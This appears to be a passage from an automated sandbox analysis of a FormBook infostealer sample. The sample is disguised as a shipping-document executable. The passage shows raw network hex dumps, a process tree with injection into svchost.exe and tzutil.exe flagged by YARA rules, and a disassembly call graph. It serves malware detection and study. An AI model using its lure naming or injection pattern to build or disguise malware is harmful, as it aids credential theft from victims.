                                                              Dec 9, 2024 09:12:41.548444033 CET1236INData Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37
                                                              Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
                                                              Dec 9, 2024 09:12:41.548455954 CET672INData Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a
                                                              Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
                                                              Dec 9, 2024 09:12:41.548468113 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                              Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                              Dec 9, 2024 09:12:41.549077034 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                              Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                              Dec 9, 2024 09:12:41.549088955 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                              Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                              Dec 9, 2024 09:12:41.549331903 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                              Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                              Dec 9, 2024 09:12:41.667767048 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                              Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:03:09:35
                                                              Start date:09/12/2024
                                                              Path:C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe"
                                                              Imagebase:0x930000
                                                              File size:1'213'952 bytes
                                                              MD5 hash:0FAC19920FD79CAF5ABD90DA55B6A5E9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:1
                                                              Start time:03:09:39
                                                              Start date:09/12/2024
                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe"
                                                              Imagebase:0xab0000
                                                              File size:46'504 bytes
                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2221510574.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2221951172.0000000005600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2221199653.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:5
                                                              Start time:03:10:23
                                                              Start date:09/12/2024
                                                              Path:C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe"
                                                              Imagebase:0x60000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3520891709.0000000001320000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3521394310.00000000042D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:6
                                                              Start time:03:10:24
                                                              Start date:09/12/2024
                                                              Path:C:\Windows\SysWOW64\tzutil.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\tzutil.exe"
                                                              Imagebase:0x930000
                                                              File size:48'640 bytes
                                                              MD5 hash:31DE852CCF7CED517CC79596C76126B4
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3520159967.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3520903347.0000000003560000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3520852127.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:moderate
                                                              Has exited:false

                                                              General

                                                              Target ID:7
                                                              Start time:03:10:50
                                                              Start date:09/12/2024
                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                              Imagebase:0x7ff6bf500000
                                                              File size:676'768 bytes
                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:3.6%
                                                                Dynamic/Decrypted Code Coverage:1.3%
                                                                Signature Coverage:8.2%
                                                                Total number of Nodes:2000
                                                                Total number of Limit Nodes:162
                                                                execution_graph 103678 933633 103679 93366a 103678->103679 103680 9336e5 103679->103680 103681 9336e7 103679->103681 103682 933688 103679->103682 103685 9336ca DefWindowProcW 103680->103685 103686 96d0cc 103681->103686 103687 9336ed 103681->103687 103683 933695 103682->103683 103684 93374b PostQuitMessage 103682->103684 103689 96d154 103683->103689 103690 9336a0 103683->103690 103691 9336d8 103684->103691 103685->103691 103733 941070 10 API calls Mailbox 103686->103733 103692 9336f2 103687->103692 103693 933715 SetTimer RegisterWindowMessageW 103687->103693 103749 992527 71 API calls _memset 103689->103749 103695 933755 103690->103695 103696 9336a8 103690->103696 103699 96d06f 103692->103699 103700 9336f9 KillTimer 103692->103700 103693->103691 103697 93373e CreatePopupMenu 103693->103697 103694 96d0f3 103734 941093 331 API calls Mailbox 103694->103734 103723 9344a0 103695->103723 103702 9336b3 103696->103702 103703 96d139 103696->103703 103697->103691 103706 96d074 103699->103706 103707 96d0a8 MoveWindow 103699->103707 103730 93443a Shell_NotifyIconW _memset 103700->103730 103709 9336be 103702->103709 103710 96d124 103702->103710 103703->103685 103748 987c36 59 API calls Mailbox 103703->103748 103704 96d166 103704->103685 103704->103691 103711 96d097 SetFocus 103706->103711 103712 96d078 103706->103712 103707->103691 103709->103685 103735 93443a Shell_NotifyIconW _memset 103709->103735 103747 992d36 81 API calls _memset 103710->103747 103711->103691 103712->103709 103715 96d081 103712->103715 103713 93370c 103731 933114 DeleteObject DestroyWindow Mailbox 103713->103731 103732 941070 10 API calls Mailbox 103715->103732 103719 96d134 103719->103691 103721 96d118 103736 93434a 103721->103736 103724 9344b7 _memset 103723->103724 103725 934539 103723->103725 103750 93407c 103724->103750 103725->103691 103727 934522 KillTimer SetTimer 103727->103725 103728 9344de 103728->103727 103729 96d4ab Shell_NotifyIconW 103728->103729 103729->103727 103730->103713 103731->103691 103732->103691 103733->103694 103734->103709 103735->103721 103737 934375 _memset 103736->103737 103869 934182 103737->103869 103740 9343fa 103742 934430 Shell_NotifyIconW 103740->103742 103743 934414 Shell_NotifyIconW 103740->103743 103744 934422 103742->103744 103743->103744 103745 93407c 61 API calls 103744->103745 103746 934429 103745->103746 103746->103680 103747->103719 103748->103680 103749->103704 103751 934098 103750->103751 103770 93416f Mailbox 103750->103770 103772 937a16 103751->103772 103754 9340b3 103777 937bcc 103754->103777 103755 96d3c8 LoadStringW 103758 96d3e2 103755->103758 103757 9340c8 103757->103758 103759 9340d9 103757->103759 103760 937b2e 59 API calls 103758->103760 103761 9340e3 103759->103761 103762 934174 103759->103762 103765 96d3ec 103760->103765 103786 937b2e 103761->103786 103795 938047 103762->103795 103771 9340ed _memset _wcscpy 103765->103771 103799 937cab 103765->103799 103767 96d40e 103769 937cab 59 API calls 103767->103769 103768 934155 Shell_NotifyIconW 103768->103770 103769->103771 103770->103728 103771->103768 103806 950db6 103772->103806 103774 937a3b 103816 938029 103774->103816 103778 937c45 103777->103778 103779 937bd8 __wsetenvp 103777->103779 103848 937d2c 103778->103848 103782 937c13 103779->103782 103783 937bee 103779->103783 103781 937bf6 _memmove 103781->103757 103785 938029 59 API calls 103782->103785 103847 937f27 59 API calls Mailbox 103783->103847 103785->103781 103787 937b40 103786->103787 103788 96ec6b 103786->103788 103856 937a51 103787->103856 103862 987bdb 59 API calls _memmove 103788->103862 103791 96ec75 103793 938047 59 API calls 103791->103793 103792 937b4c 103792->103771 103794 96ec7d Mailbox 103793->103794 103796 938052 103795->103796 103797 93805a 103795->103797 103863 937f77 59 API calls 2 library calls 103796->103863 103797->103771 103800 96ed4a 103799->103800 103801 937cbf 103799->103801 103803 938029 59 API calls 103800->103803 103864 937c50 103801->103864 103805 96ed55 __wsetenvp _memmove 103803->103805 103804 937cca 103804->103767 103808 950dbe 103806->103808 103809 950dd8 103808->103809 103811 950ddc std::exception::exception 103808->103811 103819 95571c 103808->103819 103836 9533a1 DecodePointer 103808->103836 103809->103774 103837 95859b RaiseException 103811->103837 103813 950e06 103838 9584d1 58 API calls _free 103813->103838 103815 950e18 103815->103774 103817 950db6 Mailbox 59 API calls 103816->103817 103818 9340a6 103817->103818 103818->103754 103818->103755 103820 955797 103819->103820 103824 955728 103819->103824 103845 9533a1 DecodePointer 103820->103845 103822 95579d 103846 958b28 58 API calls __getptd_noexit 103822->103846 103823 955733 103823->103824 103839 95a16b 58 API calls 2 library calls 103823->103839 103840 95a1c8 58 API calls 8 library calls 103823->103840 103841 95309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103823->103841 103824->103823 103827 95575b RtlAllocateHeap 103824->103827 103830 955783 103824->103830 103834 955781 103824->103834 103842 9533a1 DecodePointer 103824->103842 103827->103824 103829 95578f 103827->103829 103829->103808 103843 958b28 58 API calls __getptd_noexit 103830->103843 103844 958b28 58 API calls __getptd_noexit 103834->103844 103836->103808 103837->103813 103838->103815 103839->103823 103840->103823 103842->103824 103843->103834 103844->103829 103845->103822 103846->103829 103847->103781 103849 937d43 _memmove 103848->103849 103850 937d3a 103848->103850 103849->103781 103850->103849 103852 937e4f 103850->103852 103853 937e62 103852->103853 103855 937e5f _memmove 103852->103855 103854 950db6 Mailbox 59 API calls 103853->103854 103854->103855 103855->103849 103857 937a5f 103856->103857 103861 937a85 _memmove 103856->103861 103858 950db6 Mailbox 59 API calls 103857->103858 103857->103861 103859 937ad4 103858->103859 103860 950db6 Mailbox 59 API calls 103859->103860 103860->103861 103861->103792 103862->103791 103863->103797 103865 937c5f __wsetenvp 103864->103865 103866 938029 59 API calls 103865->103866 103867 937c70 _memmove 103865->103867 103868 96ed07 _memmove 103866->103868 103867->103804 103870 96d423 103869->103870 103871 934196 103869->103871 103870->103871 103872 96d42c DestroyIcon 103870->103872 103871->103740 103873 992f94 62 API calls _W_store_winword 103871->103873 103872->103871 103873->103740 103874 957c56 103875 957c62 __freefls@4 103874->103875 103911 959e08 GetStartupInfoW 103875->103911 103877 957c67 103913 958b7c GetProcessHeap 103877->103913 103879 957cbf 103880 957cca 103879->103880 103996 957da6 58 API calls 3 library calls 103879->103996 103914 959ae6 103880->103914 103883 957cd0 103884 957cdb __RTC_Initialize 103883->103884 103997 957da6 58 API calls 3 library calls 103883->103997 103935 95d5d2 103884->103935 103887 957cea 103888 957cf6 GetCommandLineW 103887->103888 103998 957da6 58 API calls 3 library calls 103887->103998 103954 964f23 GetEnvironmentStringsW 103888->103954 103891 957cf5 103891->103888 103894 957d10 103895 957d1b 103894->103895 103999 9530b5 58 API calls 3 library calls 103894->103999 103964 964d58 103895->103964 103898 957d21 103899 957d2c 103898->103899 104000 9530b5 58 API calls 3 library calls 103898->104000 103978 9530ef 103899->103978 103902 957d34 103903 957d3f __wwincmdln 103902->103903 104001 9530b5 58 API calls 3 library calls 103902->104001 103984 9347d0 103903->103984 103906 957d53 103907 957d62 103906->103907 104002 953358 58 API calls _doexit 103906->104002 104003 9530e0 58 API calls _doexit 103907->104003 103910 957d67 __freefls@4 103912 959e1e 103911->103912 103912->103877 103913->103879 104004 953187 36 API calls 2 library calls 103914->104004 103916 959aeb 104005 959d3c InitializeCriticalSectionAndSpinCount __ioinit 103916->104005 103918 959af0 103919 959af4 103918->103919 104007 959d8a TlsAlloc 103918->104007 104006 959b5c 61 API calls 2 library calls 103919->104006 103922 959af9 103922->103883 103923 959b06 103923->103919 103924 959b11 103923->103924 104008 9587d5 103924->104008 103927 959b53 104016 959b5c 61 API calls 2 library calls 103927->104016 103930 959b58 103930->103883 103931 959b32 103931->103927 103932 959b38 103931->103932 104015 959a33 58 API calls 4 library calls 103932->104015 103934 959b40 GetCurrentThreadId 103934->103883 103936 95d5de __freefls@4 103935->103936 104028 959c0b 103936->104028 103938 95d5e5 103939 9587d5 __calloc_crt 58 API calls 103938->103939 103941 95d5f6 103939->103941 103940 95d661 GetStartupInfoW 103943 95d7a5 103940->103943 103945 95d676 103940->103945 103941->103940 103942 95d601 @_EH4_CallFilterFunc@8 __freefls@4 103941->103942 103942->103887 103944 95d86d 103943->103944 103948 95d7f2 GetStdHandle 103943->103948 103950 95d805 GetFileType 103943->103950 104036 959e2b InitializeCriticalSectionAndSpinCount 103943->104036 104037 95d87d LeaveCriticalSection _doexit 103944->104037 103945->103943 103947 9587d5 __calloc_crt 58 API calls 103945->103947 103949 95d6c4 103945->103949 103947->103945 103948->103943 103949->103943 103951 95d6f8 GetFileType 103949->103951 104035 959e2b InitializeCriticalSectionAndSpinCount 103949->104035 103950->103943 103951->103949 103955 957d06 103954->103955 103956 964f34 103954->103956 103960 964b1b GetModuleFileNameW 103955->103960 104077 95881d 58 API calls __malloc_crt 103956->104077 103958 964f5a _memmove 103959 964f70 FreeEnvironmentStringsW 103958->103959 103959->103955 103961 964b4f _wparse_cmdline 103960->103961 103963 964b8f _wparse_cmdline 103961->103963 104078 95881d 58 API calls __malloc_crt 103961->104078 103963->103894 103965 964d71 __wsetenvp 103964->103965 103969 964d69 103964->103969 103966 9587d5 __calloc_crt 58 API calls 103965->103966 103974 964d9a __wsetenvp 103966->103974 103967 964df1 103968 952d55 _free 58 API calls 103967->103968 103968->103969 103969->103898 103970 9587d5 __calloc_crt 58 API calls 103970->103974 103971 964e16 103973 952d55 _free 58 API calls 103971->103973 103973->103969 103974->103967 103974->103969 103974->103970 103974->103971 103975 964e2d 103974->103975 104079 964607 58 API calls strtoxl 103974->104079 104080 958dc6 IsProcessorFeaturePresent 103975->104080 103977 964e39 103977->103898 103979 9530fb __IsNonwritableInCurrentImage 103978->103979 104103 95a4d1 103979->104103 103981 953119 __initterm_e 103983 953138 _doexit __IsNonwritableInCurrentImage 103981->103983 104106 952d40 103981->104106 103983->103902 103985 934889 103984->103985 103986 9347ea 103984->103986 103985->103906 103987 934824 IsThemeActive 103986->103987 104141 95336c 103987->104141 103991 934850 104153 9348fd SystemParametersInfoW SystemParametersInfoW 103991->104153 103993 93485c 104154 933b3a 103993->104154 103995 934864 SystemParametersInfoW 103995->103985 103996->103880 103997->103884 103998->103891 104002->103907 104003->103910 104004->103916 104005->103918 104006->103922 104007->103923 104011 9587dc 104008->104011 104010 958817 104010->103927 104014 959de6 TlsSetValue 104010->104014 104011->104010 104013 9587fa 104011->104013 104017 9651f6 104011->104017 104013->104010 104013->104011 104025 95a132 Sleep 104013->104025 104014->103931 104015->103934 104016->103930 104018 965201 104017->104018 104022 96521c 104017->104022 104019 96520d 104018->104019 104018->104022 104026 958b28 58 API calls __getptd_noexit 104019->104026 104021 96522c HeapAlloc 104021->104022 104023 965212 104021->104023 104022->104021 104022->104023 104027 9533a1 DecodePointer 104022->104027 104023->104011 104025->104013 104026->104023 104027->104022 104029 959c1c 104028->104029 104030 959c2f EnterCriticalSection 104028->104030 104038 959c93 104029->104038 104030->103938 104032 959c22 104032->104030 104062 9530b5 58 API calls 3 library calls 104032->104062 104035->103949 104036->103943 104037->103942 104039 959c9f __freefls@4 104038->104039 104040 959cc0 104039->104040 104041 959ca8 104039->104041 104047 959ce1 __freefls@4 104040->104047 104066 95881d 58 API calls __malloc_crt 104040->104066 104063 95a16b 58 API calls 2 library calls 104041->104063 104043 959cad 104064 95a1c8 58 API calls 8 library calls 104043->104064 104046 959cd5 104049 959cdc 104046->104049 104050 959ceb 104046->104050 104047->104032 104048 959cb4 104065 95309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104048->104065 104067 958b28 58 API calls __getptd_noexit 104049->104067 104052 959c0b __lock 58 API calls 104050->104052 104054 959cf2 104052->104054 104056 959d17 104054->104056 104057 959cff 104054->104057 104069 952d55 104056->104069 104068 959e2b InitializeCriticalSectionAndSpinCount 104057->104068 104060 959d0b 104075 959d33 LeaveCriticalSection _doexit 104060->104075 104063->104043 104064->104048 104066->104046 104067->104047 104068->104060 104070 952d5e RtlFreeHeap 104069->104070 104074 952d87 _free 104069->104074 104071 952d73 104070->104071 104070->104074 104076 958b28 58 API calls __getptd_noexit 104071->104076 104073 952d79 GetLastError 104073->104074 104074->104060 104075->104047 104076->104073 104077->103958 104078->103963 104079->103974 104081 958dd1 104080->104081 104086 958c59 104081->104086 104085 958dec 104085->103977 104087 958c73 _memset ___raise_securityfailure 104086->104087 104088 958c93 IsDebuggerPresent 104087->104088 104094 95a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104088->104094 104091 958d57 ___raise_securityfailure 104095 95c5f6 104091->104095 104092 958d7a 104093 95a140 GetCurrentProcess TerminateProcess 104092->104093 104093->104085 104094->104091 104096 95c600 IsProcessorFeaturePresent 104095->104096 104097 95c5fe 104095->104097 104099 96590a 104096->104099 104097->104092 104102 9658b9 5 API calls 2 library calls 104099->104102 104101 9659ed 104101->104092 104102->104101 104104 95a4d4 EncodePointer 104103->104104 104104->104104 104105 95a4ee 104104->104105 104105->103981 104109 952c44 104106->104109 104108 952d4b 104108->103983 104110 952c50 __freefls@4 104109->104110 104117 953217 104110->104117 104116 952c77 __freefls@4 104116->104108 104118 959c0b __lock 58 API calls 104117->104118 104119 952c59 104118->104119 104120 952c88 DecodePointer DecodePointer 104119->104120 104121 952cb5 104120->104121 104122 952c65 104120->104122 104121->104122 104134 9587a4 59 API calls strtoxl 104121->104134 104131 952c82 104122->104131 104124 952d18 EncodePointer EncodePointer 104124->104122 104125 952cc7 104125->104124 104126 952cec 104125->104126 104135 958864 61 API calls 2 library calls 104125->104135 104126->104122 104129 952d06 EncodePointer 104126->104129 104136 958864 61 API calls 2 library calls 104126->104136 104129->104124 104130 952d00 104130->104122 104130->104129 104137 953220 104131->104137 104134->104125 104135->104126 104136->104130 104140 959d75 LeaveCriticalSection 104137->104140 104139 952c87 104139->104116 104140->104139 104142 959c0b __lock 58 API calls 104141->104142 104143 953377 DecodePointer EncodePointer 104142->104143 104206 959d75 LeaveCriticalSection 104143->104206 104145 934849 104146 9533d4 104145->104146 104147 9533de 104146->104147 104148 9533f8 104146->104148 104147->104148 104207 958b28 58 API calls __getptd_noexit 104147->104207 104148->103991 104150 9533e8 104208 958db6 9 API calls strtoxl 104150->104208 104152 9533f3 104152->103991 104153->103993 104155 933b47 __write_nolock 104154->104155 104209 937667 104155->104209 104159 933b7a IsDebuggerPresent 104160 96d272 MessageBoxA 104159->104160 104161 933b88 104159->104161 104164 96d28c 104160->104164 104162 933c61 104161->104162 104161->104164 104165 933ba5 104161->104165 104163 933c68 SetCurrentDirectoryW 104162->104163 104166 933c75 Mailbox 104163->104166 104413 937213 59 API calls Mailbox 104164->104413 104295 937285 104165->104295 104166->103995 104169 96d29c 104174 96d2b2 SetCurrentDirectoryW 104169->104174 104171 933bc3 GetFullPathNameW 104172 937bcc 59 API calls 104171->104172 104173 933bfe 104172->104173 104311 94092d 104173->104311 104174->104166 104177 933c1c 104178 933c26 104177->104178 104414 98874b AllocateAndInitializeSid CheckTokenMembership FreeSid 104177->104414 104327 933a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104178->104327 104181 96d2cf 104181->104178 104184 96d2e0 104181->104184 104415 934706 104184->104415 104185 933c30 104187 933c43 104185->104187 104189 93434a 68 API calls 104185->104189 104335 9409d0 104187->104335 104188 96d2e8 104422 937de1 104188->104422 104189->104187 104192 933c4e 104192->104162 104412 93443a Shell_NotifyIconW _memset 104192->104412 104193 96d2f5 104194 96d324 104193->104194 104195 96d2ff 104193->104195 104197 937cab 59 API calls 104194->104197 104198 937cab 59 API calls 104195->104198 104199 96d320 GetForegroundWindow ShellExecuteW 104197->104199 104200 96d30a 104198->104200 104203 96d354 Mailbox 104199->104203 104203->104162 104206->104145 104207->104150 104208->104152 104210 950db6 Mailbox 59 API calls 104209->104210 104211 937688 104210->104211 104212 950db6 Mailbox 59 API calls 104211->104212 104213 933b51 GetCurrentDirectoryW 104212->104213 104214 933766 104213->104214 104215 937667 59 API calls 104214->104215 104216 93377c 104215->104216 104426 933d31 104216->104426 104218 93379a 104219 934706 61 API calls 104218->104219 104220 9337ae 104219->104220 104221 937de1 59 API calls 104220->104221 104222 9337bb 104221->104222 104440 934ddd 104222->104440 104225 96d173 104507 99955b 104225->104507 104226 9337dc Mailbox 104229 938047 59 API calls 104226->104229 104232 9337ef 104229->104232 104230 96d192 104231 952d55 _free 58 API calls 104230->104231 104234 96d19f 104231->104234 104464 93928a 104232->104464 104236 934e4a 84 API calls 104234->104236 104238 96d1a8 104236->104238 104242 933ed0 59 API calls 104238->104242 104239 937de1 59 API calls 104240 933808 104239->104240 104467 9384c0 104240->104467 104244 96d1c3 104242->104244 104243 93381a Mailbox 104245 937de1 59 API calls 104243->104245 104246 933ed0 59 API calls 104244->104246 104247 933840 104245->104247 104248 96d1df 104246->104248 104249 9384c0 69 API calls 104247->104249 104250 934706 61 API calls 104248->104250 104253 93384f Mailbox 104249->104253 104251 96d204 104250->104251 104252 933ed0 59 API calls 104251->104252 104254 96d210 104252->104254 104255 937667 59 API calls 104253->104255 104256 938047 59 API calls 104254->104256 104257 93386d 104255->104257 104258 96d21e 104256->104258 104471 933ed0 104257->104471 104260 933ed0 59 API calls 104258->104260 104262 96d22d 104260->104262 104268 938047 59 API calls 104262->104268 104264 933887 104264->104238 104265 933891 104264->104265 104266 952efd _W_store_winword 60 API calls 104265->104266 104267 93389c 104266->104267 104267->104244 104269 9338a6 104267->104269 104270 96d24f 104268->104270 104271 952efd _W_store_winword 60 API calls 104269->104271 104272 933ed0 59 API calls 104270->104272 104273 9338b1 104271->104273 104275 96d25c 104272->104275 104273->104248 104274 9338bb 104273->104274 104276 952efd _W_store_winword 60 API calls 104274->104276 104275->104275 104277 9338c6 104276->104277 104277->104262 104278 933907 104277->104278 104280 933ed0 59 API calls 104277->104280 104278->104262 104279 933914 104278->104279 104487 9392ce 104279->104487 104281 9338ea 104280->104281 104283 938047 59 API calls 104281->104283 104285 9338f8 104283->104285 104288 933ed0 59 API calls 104285->104288 104288->104278 104290 93928a 59 API calls 104292 93394f 104290->104292 104291 938ee0 60 API calls 104291->104292 104292->104290 104292->104291 104293 933ed0 59 API calls 104292->104293 104294 933995 Mailbox 104292->104294 104293->104292 104294->104159 104296 937292 __write_nolock 104295->104296 104297 9372ab 104296->104297 104298 96ea22 _memset 104296->104298 105154 934750 104297->105154 104300 96ea3e GetOpenFileNameW 104298->104300 104302 96ea8d 104300->104302 104305 937bcc 59 API calls 104302->104305 104307 96eaa2 104305->104307 104307->104307 104308 9372c9 105182 93686a 104308->105182 104312 94093a __write_nolock 104311->104312 105439 936d80 104312->105439 104314 94093f 104315 933c14 104314->104315 105450 94119e 89 API calls 104314->105450 104315->104169 104315->104177 104317 94094c 104317->104315 105451 943ee7 91 API calls Mailbox 104317->105451 104319 940955 104319->104315 104320 940959 GetFullPathNameW 104319->104320 104321 937bcc 59 API calls 104320->104321 104322 940985 104321->104322 104323 937bcc 59 API calls 104322->104323 104324 940992 104323->104324 104325 974cab _wcscat 104324->104325 104326 937bcc 59 API calls 104324->104326 104326->104315 104328 933ab0 LoadImageW RegisterClassExW 104327->104328 104329 96d261 104327->104329 105485 933041 7 API calls 104328->105485 105486 9347a0 LoadImageW EnumResourceNamesW 104329->105486 104332 933b34 104334 9339d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104332->104334 104333 96d26a 104334->104185 104336 974cc3 104335->104336 104347 9409f5 104335->104347 105626 999e4a 89 API calls 4 library calls 104336->105626 104338 940cfa 104338->104192 104340 940ee4 104340->104338 104342 940ef1 104340->104342 105624 941093 331 API calls Mailbox 104342->105624 104343 940a4b PeekMessageW 104379 940a05 Mailbox 104343->104379 104345 940ef8 LockWindowUpdate DestroyWindow GetMessageW 104345->104338 104349 940f2a 104345->104349 104347->104379 105627 939e5d 60 API calls 104347->105627 105628 986349 331 API calls 104347->105628 104348 974e81 Sleep 104348->104379 104352 975c58 TranslateMessage DispatchMessageW GetMessageW 104349->104352 104350 940ce4 104350->104338 105623 941070 10 API calls Mailbox 104350->105623 104352->104352 104353 975c88 104352->104353 104353->104338 104354 940ea5 TranslateMessage DispatchMessageW 104355 940e43 PeekMessageW 104354->104355 104355->104379 104356 974d50 TranslateAcceleratorW 104356->104355 